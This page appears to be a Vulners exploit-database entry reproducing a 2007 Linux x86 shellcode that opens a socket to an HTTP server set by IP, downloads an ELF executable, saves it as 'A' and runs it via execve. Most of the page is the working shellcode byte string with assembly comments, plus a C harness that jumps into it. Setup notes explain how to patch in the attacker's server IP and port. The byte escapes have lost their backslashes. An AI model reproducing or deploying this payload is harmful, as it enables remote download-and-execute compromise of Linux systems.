Vulners
Lucene search
linux/x86 HTTP/1.x GET, Downloads and execve() 111 bytes+
/*
* (linux/x86) - HTTP/1.x GET, Downloads and execve() - 111 bytes+
*
* This shellcode allows you to download a ELF executable straight off a standard HTTP server
* and launch it. It will saved locally it into a filename called 'A' in the current directory.
*
* <CONFIGURATION>
*
* > The destination IP of the HTTP server is required (NO DNS!), use inet_addr() function result and
* modify the value in [1*] from 0xdeadbeef to the actual IP, if the IP contains NULLs then a little
* workaround requires. The simplest is to use ~inet_addr() followed by ``notl (%esp)`` to change back.
*
* > The destination port of the HTTP server is 80 by default, it is located within the 4 upper bytes
* of the value in [2*] (0xafff). Stored in an invert format (~), so if any further modification
* needed make sure to keep it stored in the same format.
*
* > The destination URL should be generated using the ``gen_httpreq`` utility. It will produce an
* assembly code which is a series of PUSH's and should be pasted as it is within in the marked place
* in the shellcode (look for the comment).
*
* <LINKS/UTILITIES>:
*
* gen_httpreq.c, generates a HTTP GET request for this shellcode
* > http://www.tty64.org/code/shellcodes/utilities/gen_httpreq.c
* backup
* > http://www.milw0rm.com/shellcode/2618
*
* - izik <[email protected]>
*/
char shellcode[] =
"x6ax66" // push $0x66
"x58" // pop %eax
"x99" // cltd
"x6ax01" // push $0x1
"x5b" // pop %ebx
"x52" // push %edx
"x53" // push %ebx
"x6ax02" // push $0x2
"x89xe1" // mov %esp,%ecx
"xcdx80" // int $0x80
"x5b" // pop %ebx
"x5e" // pop %esi
"x68xefxbexadxde" // [1*] push $0xdeadbeef
"xbdxfdxffxffxaf" // [2*] mov $0xaffffffd,%ebp
"xf7xd5" // not %ebp
"x55" // push %ebp
"x43" // inc %ebx
"x6ax10" // push $0x10
"x51" // push %ecx
"x50" // push %eax
"xb0x66" // mov $0x66,%al
"x89xe1" // mov %esp,%ecx
"xcdx80" // int $0x80
"x5f" // pop %edi
"xb0x08" // mov $0x8,%al
"x52" // push %edx
"x6ax41" // push $0x41
"x89xe3" // mov %esp,%ebx
"x50" // push %eax
"x59" // pop %ecx
"xcdx80" // int $0x80
"x96" // xchg %eax,%esi
"x87xdf" // xchg %ebx,%edi
//
// <paste here the code, that gen_httpreq.c outputs!>
//
"xb0x04" // mov $0x4,%al
//
// <_send_http_request>:
//
"x89xe1" // mov %esp,%ecx
"xcdx80" // int $0x80
"x99" // cltd
"x42" // inc %edx
//
// <_wait_for_dbl_crlf>:
//
"x49" // dec %ecx
"xb0x03" // mov $0x3,%al
"xcdx80" // int $0x80
"x81x39x0ax0dx0ax0d" // cmpl $0xd0a0d0a,(%ecx)
"x75xf3" // jne <_wait_for_dbl_crlf>
"xb2x04" // mov $0x4,%dl
//
// <_dump_loop_do_read>:
//
"xb0x03" // mov $0x3,%al
"xf8" // clc
//
// <_dump_loop_do_write>:
//
"xcdx80" // int $0x80
"x87xde" // xchg %ebx,%esi
"x72xf7" // jb <_dump_loop_do_read>
"x85xc0" // test %eax,%eax
"x74x05" // je <_close_file>
"xb0x04" // mov $0x4,%al
"xf9" // stc
"xebxf1" // jmp <_dump_loop_do_write>
"xb0x06" // mov $0x6,%al
"xcdx80" // int $0x80
"x99" // cltd
"xb0x0b" // mov $0xb,%al
"x89xfb" // mov %edi,%ebx
"x52" // push %edx
"x53" // push %ebx
"xebxcc"; // jmp <_send_http_request>
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1